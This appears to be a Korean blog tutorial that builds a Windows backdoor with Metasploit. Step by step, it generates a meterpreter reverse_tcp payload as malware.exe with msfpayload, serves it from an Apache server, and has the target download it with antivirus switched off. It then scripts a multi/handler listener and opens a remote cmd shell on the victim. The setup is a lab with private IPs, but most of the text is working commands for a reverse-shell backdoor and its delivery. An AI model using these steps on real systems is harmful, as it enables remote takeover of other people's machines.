Metasploit을 이용해서 Backdoor를 만들어 보자


msfpayload 라는 기능을 사용할 껀데



도움말을 보면 잘 모르겠다;;


msfpayload windows/meterpreter/reverse_tcp O


이렇게 쳐보자



좀더 보기 쉬워졌다;;


msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.17.40 X > malware.exe


이런식으로 써주자 (LHOST=공격자ip)


이제 mv malware.exe /var/www/malware.exe 해주자


service apache2 start 웹서버도 켜주자



이제 테스트 할 타겟 윈도우를 하나 준비해서


웹브라우저를 열고 http://Kali의 웹서버ip/malware.exe


다운 받는다 (사용하는 백신이 있다면 잠시 꺼두워야한다)


msfconsole에 들어가서 하나하나 명령어를 다 써줘도 되지만


다른 방법으로 msfconsole을 실행해 보겠다


echo use exploit/multi/handler >> reverse_resource.rc

echo set payload windows/meterpreter/reverse_tcp >> reverse_resource.rc

echo set lhost 192.168.17.40 >> reverse_resource.rc

echo set exitsession false >> reverse_resource.rc

echo exploit -f -z >> reverse_resource.rc


cat reverse_resource.rc




이제 msfconsole -r reverse_resource.rc



자동으로 입력이 되면서 타겟(Target)이 malware.exe를 실행하길 기다리게 된다



윈도우에서 다운받은 malware.exe 를 실행하면 192.168.17.41번이


연결 되었다고 뜬다


sessions -l 을 이용해서 확인해보면 xp가 연결된걸 볼수있다


sessions -i 1 을 써서 세션을 불러왔고


shell명령어를 통해 cmd창에 들어왔다


글자가 깨져나오는데 문자 인코딩 설정 때문이다


터미널창에서 바꿔주면 제대로 나온다